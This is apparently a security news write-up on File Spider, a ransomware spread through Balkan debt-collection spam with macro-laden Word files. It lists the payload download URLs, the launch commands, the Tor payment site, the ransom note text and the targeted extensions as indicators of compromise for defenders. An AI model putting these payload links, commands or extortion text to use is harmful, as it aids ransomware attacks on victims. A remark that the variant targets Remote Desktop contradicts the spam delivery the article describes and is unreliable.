A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia.  These spam emails contains malicious Word documents that will download and install the File Spider ransomware onto a victims computer.

File Spider Ransomware targeting the Balkans

File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia.  The spam start with subjects like "Potrazivanje dugovanja", which translates to "Debt Collection" and whose message, according to Google Translate, appear to be in Serbian.

Spam email example
Spam email example

These emails will have an attached word document with malicious macros that pretends to be a debt collection notice, which according to Google Translate is written in Croatian.

Malicious Word Document
Malicious Word Document

If a user clicks on the Enable Editing, followed by the Enable Content buttons, the embedded macro will download the ransomware executables from a remote site and execute them.

Malicious Macro
Malicious Macro

The macro, shown above, contains a Base64 encoded PowerShell script that when executed will download XOR encrypted files called enc.exe and dec.exe from a remote site. The URLs that are used to download the files are currently:

http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js
http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js 

When downloading the files, they will be decrypted and saved to the %AppData% \Spider folder.

The PowerShell script will then execute both enc.exe, which is the encrypter, and dec.exe, which is the decrypter and gui, with the following commands:

"%AppData%\Roaming\Spider\enc.exe" spider ktn 100 
"%AppData%\Roaming\Spider\dec.exe" spider 

File Spider will now begin to encrypt the victim's computer.

How File Spider encrypts a computer

Once the macros in the malicious document execute, the ransomware will be downloaded and executed on the computer. This will cause two processes to be executed called enc.exe and dec.exe. Dec.exe is the decryptor and GUI for the ransomware and will quietly run in the background until enc.exe, which is the encryptor, is finished encrypting the computer.

While enc.exe is running, it will scan the local drivers of the computer and encrypt any files that match targeted extension with AES-128 bit encryption. The file extensions that are targeted by File Spider are listed at the end of this article. This AES key is then encrypted using a bundled RSA key and saved 

When encrypting, it will skip files located in the following folders:

tmp
Videos
winnt
Application Data
Spider
PrefLogs
Program Files (x86)
Program Files
ProgramData
Temp
Recycle
System Volume Information
Boot
Windows

When a file is encrypted, it will log the original file name to %UserProfile%\AppData\Roaming\Spider\files.txt and append the .spider extension to the encrypted file's name. For example, a file called test.jpg would be encrypted and then renamed to test.jpg.spider.

Encrypted Spider Files
Encrypted Spider Files

In each folder that a file is encrypted, the encryptor will also create a ransom note named HOW TO DECRYPT FILES.url, which when clicked on will open a video tutorial at the URL https://vid.me/embedded/CGyDc?autoplay=1&stats=1.

The encryptor will also create a file on the desktop called DECRYPTER.url, which launches the dec.exe file.

Finally, the enc.exe program will create a file called %UserProfile%\AppData\Roaming\Spider\5p1d3r and exit. When the dec.exe program detects that this file is created, it will display the decrypter GUI as shown below.

File Spider Start Page
File Spider Start Page
File Spider Visit Website
File Spider Start Page
File Spider Victim ID
File Spider Victim ID
 
File Spider Decrypt Page
File Spider Decrypt Tab
 

This GUI contains multiple tabs that allow you to switch the language between English and Croatian, display the TOR payment site located at http://spiderwjzbmsmu7y.onion, the victim's ID code that is needed to login to the TOR site, the decrypter, and a help file. The GUI also contains a contact email of file-spider@protonmail.ch.

When a user goes to the TOR site, they will be prompted to login using the victim ID found in the decryptor GUI.  Once logged in, they will be presented with a page that provides instructions on how to pay the ransom, which is currently .00726 bitcoins, or around $123.25, to get the files back.

Spider Decrypter Page
Spider Decrypter Page

The ransomware is currently being analyzed, but as the AES key is encrypted with a bundled RSA key, it is unlikely that the files can be decrypted for free.

I would also like to thank @GrujaRS@malwrhunterteam, and @B_H101 for directing me to information on how this ransomware is currently being spread. For further reading, @sdkhere has performed an analysis of this ransomware as well.

How to protect yourself from the File Spider Ransomware

In order to protect yourself from ransomware, it is important that you use good computing habits and security software. First and foremost, you should always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack.

You should also have security software that incorporates behavioral detections to combat ransomware and not just signature detections or heuristics. 

Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all:

  • Backup, Backup, Backup!
  • Do not open attachments if you do not know who sent them.
  • Do not open attachments until you confirm that the person actually sent you them,
  • Scan attachments with tools like VirusTotal.
  • Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
  • Make sure you use have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if your willing to stock with it, could have the biggest payoffs.
  • Use hard passwords and never reuse the same password at multiple sites.

As this particular variant targets open Remote Desktop services it is important that you do not connect a remote desktop server directly to the Internet. Instead you should require a user to VPN into your network first to be able to connect to the remote desktop server.

For a complete guide on ransomware protection, you visit our How to Protect and Harden a Computer against Ransomware article.

Related Articles:

New Brrr Dharma Ransomware Variant Released

Kraken Cryptor Ransomware Masquerading as SuperAntiSpyware Security Program

The Week in Ransomware - September 14th 2018 - Kraken, Dharma, & Matrix

Fallout Exploit Kit Pushing the SAVEfiles Ransomware

Koolova Ransomware Decrypts for Free if you Read Two Articles about Ransomware

IOCs

File Hashes:

dec.exe: 74e5096f09a031800216640a8455bc487e9a32b2e56fbad9d083c3810ed5488e
enc.exe: 6500a1baa13e0698e3ed41b4465e5824e9a316b22209223754f0ab04a6e1b853

Filenames associated with the File Spider Ransomware Variant:

%UserProfile%\AppData\Roaming\Spider\
%UserProfile%\AppData\Roaming\Spider\5p1d3r
%UserProfile%\AppData\Roaming\Spider\dec.exe
%UserProfile%\AppData\Roaming\Spider\enc.exe
%UserProfile%\AppData\Roaming\Spider\files.txt
%UserProfile%\AppData\Roaming\Spider\id.txt
%UserProfile%\AppData\Roaming\Spider\run.bat
%UserProfile%\Desktop\DECRYPTER.url

Network connections:

http://spiderwjzbmsmu7y.onion
https://vid.me/embedded/CGyDc?autoplay=1&stats=1
http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js
http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js 

File Spider Ransomware Ransom Note Text:

As you may have already noticed, all your important files are encrypted and you no longer have access to them. A unique key has been generated specifically for this PC and two very strong encryption algorithm was applied in that process. Original content of your files are wiped and overwritten with encrypted data so it cannot be recovered using any conventional data recovery tool. 

The good news is that there is still a chance to recover your files, you just need to have the right key.

To obtain the key, visit our website from the menu above. You have to be fast, after 96 hours the key will be blocked and all your files will remain permanently encrypted since no one will be able to recover them without the key!

Remember, do not try anything stupid, the program has several security measures to delete all your files and cause the damage to your PC.

To avoid any misunderstanding, please read Help section.

Emails Associated with the File Spider Ransomware:

file-spider@protonmail.ch

Targeted File Extensions:

lnk, url, contact, 1cd, dbf, dt, cf, cfu, mxl, epf, kdbx, erf, vrp, grs, geo, st, conf, pff, mft, efd, 3dm, 3ds, rib, ma, sldasm, sldprt, max, blend, lwo, lws, m3d, mb, obj, x, x3d, movie, byu, c4d, fbx, dgn, dwg, 4db, 4dl, 4mp, abs, accdb, accdc, accde, accdr, accdt, accdw, accft, adn, a3d, adp, aft, ahd, alf, ask, awdb, azz, bdb, bib, bnd, bok, btr, bak, backup, cdb, ckp, clkw, cma, crd, daconnections, dacpac, dad, dadiagrams, daf, daschema, db, db-shm, db-wal, db2, db3, dbc, dbk, dbs, dbt, dbv, dbx, dcb, dct, dcx, ddl, df1, dmo, dnc, dp1, dqy, dsk, dsn, dta, dtsx, dxl, eco, ecx, edb, emd, eql, fcd, fdb, fic, fid, fil, fm5, fmp, fmp12, fmpsl, fol, fp3, fp4, fp5, fp7, fpt, fzb, fzv, gdb, gwi, hdb, his, ib, idc, ihx, itdb, itw, jtx, kdb, lgc, maq, mdb, mdbhtml, mdf, mdn, mdt, mrg, mud, mwb, s3m, myd, ndf, ns2, ns3, ns4, nsf, nv2, nyf, oce, odb, oqy, ora, orx, owc, owg, oyx, p96, p97, pan, pdb, pdm, phm, pnz, pth, pwa, qpx, qry, qvd, rctd, rdb, rpd, rsd, sbf, sdb, sdf, spq, sqb, stp, sql, sqlite, sqlite3, sqlitedb, str, tcx, tdt, te, teacher, tmd, trm, udb, usr, v12, vdb, vpd, wdb, wmdb, xdb, xld, xlgc, zdb, zdc, cdr, cdr3, ppt, pptx, 1st, abw, act, aim, ans, apt, asc, ascii, ase, aty, awp, awt, aww, bad, bbs, bdp, bdr, bean, bna, boc, btd, bzabw, chart, chord, cnm, crwl, cyi, dca, dgs, diz, dne, doc, docm, docx, docxml, docz, dot, dotm, dotx, dsv, dvi, dx, eio, eit, email, emlx, epp, err, etf, etx, euc, fadein, faq, fb2, fbl, fcf, fdf, fdr, fds, fdt, fdx, fdxt, fes, fft, flr, fodt, fountain, gtp, frt, fwdn, fxc, gdoc, gio, gpn, gsd, gthr, gv, hbk, hht, hs, htc, hwp, hz, idx, iil, ipf, jarvis, jis, joe, jp1, jrtf, kes, klg, knt, kon, kwd, latex, lbt, lis, lit, lnt, lp2, lrc, lst, ltr, ltx, lue, luf, lwp, lxfml, lyt, lyx, man, map, mbox, md5txt, me, mell, min, mnt, msg, mwp, nfo, njx, notes, now, nwctxt, nzb, ocr, odm, odo, odt, ofl, oft, openbsd, ort, ott, p7s, pages, pfs, pfx, pjt, plantuml, prt, psw, pu, pvj, pvm, pwi, pwr, qdl, rad, readme, rft, ris, rng, rpt, rst, rt, rtd, rtf, rtx, run, rzk, rzn, saf, safetext, sam, scc, scm, scriv, scrivx, sct, scw, sdm, sdoc, sdw, sgm, sig, skcard, sla, slagz, sls, smf, sms, ssa, strings, stw, sty, sub, sxg, sxw, tab, tdf, tex, text, thp, tlb, tm, tmv, tmx, tpc, trelby, tvj, txt, u3d, u3i, unauth, unx, uof, uot, upd, utf8, unity, utxt, vct, vnt, vw, wbk, wcf, webdoc, wgz, wn, wp, wp4, wp5, wp6, wp7, wpa, wpd, wpl, wps, wpt, wpw, wri, wsc, wsd, wsh, wtx, xbdoc, xbplate, xdl, xlf, xps, xwp, xy3, xyp, xyw, ybk, yml, zabw, zw, 2bp, 036, 3fr, 0411, 73i, 8xi, 9png, abm, afx, agif, agp, aic, albm, apd, apm, apng, aps, apx, art, artwork, arw, asw, avatar, bay, blkrt, bm2, bmp, bmx, bmz, brk, brn, brt, bss, bti, c4, cal, cals, can, cd5, cdc, cdg, cimg, cin, cit, colz, cpc, cpd, cpg, cps, cpx, cr2, ct, dc2, dcr, dds, dgt, dib, dicom, djv, djvu, dm3, dmi, vue, dpx, wire, drz, dt2, dtw, dvl, ecw, eip, exr, fal, fax, fpos, fpx, g3, gcdp, gfb, gfie, ggr, gif, gih, gim, gmbck, gmspr, spr, scad, gpd, gro, grob, hdp, hdr, hpi, i3d, icn, icon, icpr, iiq, info, int, ipx, itc2, iwi, j, j2c, j2k, jas, jb2, jbig, jbig2, jbmp, jbr, jfif, jia, jng, jp2, jpe, jpeg, jpg, jpg2, jps, jpx, jtf, jwl, jxr, kdc, kdi, kdk, kic, kpg, lbm, ljp, mac, mbm, mef, mnr, mos, mpf, mpo, mrxs, myl, ncr, nct, nlm, nrw, oc3, oc4, oc5, oci, omf, oplc, af2, af3, ai, asy, cdmm, cdmt, cdmtz, cdmz, cdt, cgm, cmx, cnv, csy, cv5, cvg, cvi, cvs, cvx, cwt, cxf, dcs, ded, design, dhs, dpp, drw, dxb, dxf, egc, emf, ep, eps, epsf, fh10, fh11, fh3, fh4, fh5, fh6, fh7, fh8, fif, fig, fmv, ft10, ft11, ft7, ft8, ft9, ftn, fxg, gdraw, gem, glox, hpg, hpgl, hpl, idea, igt, igx, imd, vbox, vdi, ink, lmk, mgcb, mgmf, mgmt, mt9, mgmx, mgtx, mmat, mat, otg, ovp, ovr, pcs, pfd, pfv, pl, plt, pm, vrml, pmg, pobj, ps, psid, rdl, scv, sk1, sk2, slddrt, snagitstamps, snagstyles, ssk, stn, svf, svg, svgz, sxd, tlc, tne, ufr, vbr, vec, vml, vsd, vsdm, vsdx, vstm, stm, vstx, wmf, wpg, vsm, vault, xar, xmind, xmmap, yal, orf, ota, oti, ozb, ozj, ozt, pal, pano, pap, pbm, pc1, pc2, pc3, pcd, pcx, pdd, pdn, pe4, pef, pfi, pgf, pgm, pi1, pi2, pi3, pic, pict, pix, pjpeg, pjpg, png, pni, pnm, pntg, pop, pp4, pp5, ppm, prw, psd, psdx, pse, psp, pspbrush, ptg, ptx, pvr, px, pxr, pz3, pza, pzp, pzs, z3d, qmg, ras, rcu, rgb, rgf, ric, riff, rix, rle, rli, rpf, rri, rs, rsb, rsr, rw2, rwl, s2mv, sai, sci, sep, sfc, sfera, sfw, skm, sld, sob, spa, spe, sph, spj, spp, sr2, srw, ste, sumo, sva, save, ssfn, t2b, tb0, tbn, tfc, tg4, thm, thumb, tif, tiff, tjp, tm2, tn, tpi, ufo, uga, usertile-ms, vda, vff, vpe, vst, wb1, wbc, wbd, wbm, wbmp, wbz, wdp, webp, wpb, wpe, wvl, x3f, y, ysp, zif, cdr4, cdr6, cdrw, pdf, pbd, pbl, ddoc, css, pptm, raw, cpt, tga, xpm, ani, flc, fb3, fli, mng, smil, mobi, swf, html, xls, xlsx, csv, xlsm, ods, xhtm, 7z, m2, rb, rar, wmo, mcmeta, m4a, itm, vfs0, indd, sb, mpqge, fos, p7c, wmv, mcgame, db0, p7b, vdf, DayZProfile, p12, d3dbsp, ztmp, rofl, sc2save, sis, hkx, pem, dbfv, sie, sid, bar, crt, sum, ncf, upk, cer, wb2, ibank, menu, das, der, t13, layout, t12, dmp, litemod, dxg, qdf, blob, asset, xf, esm, forge, tax, 001, r3d, pst, pkpass, vtf, bsa, bc6, dazip, apk, bc7, fpk, re4, bkp, mlx, sav, raf, qic, kf, lbf, bkf, iwd, slm, xlk, sidn, vpk, bik, mrwref, xlsb, sidd, tor, epk, mddata, psk, rgss3a, itl, rim, pak, w3x, big, icxs, fsh, unity3d, hvpl, ntl, wotreplay, crw, hplg, arch00, xxx, hkdb, lvl, desc, mdbackup, snx, py, srf, odc, syncdb, cfr, m3u, gho, ff, odp, cas, vpp_pc, js, dng, lrf, c, cpp, cs, h, bat, ps1, php, asp, java, jar, class, aaf, aep, aepx, plb, prel, prproj, aet, ppj, indl, indt, indb, inx, idml, pmd, xqx, fla, as3, as, docb, xlt, xlm, xltx, xltm, xla, xlam, xll, xlw, pot, pps, potx, potm, ppam, ppsx, ppsm, sldx, sldm, aif, iff, m4u, mid, mpa, ra, 3gp, 3g2, asf, asx, vob, m3u8, mkv, dat, efx, vcf, xml, ses, zip, 7zip, mp4, 3gp, webm, wmv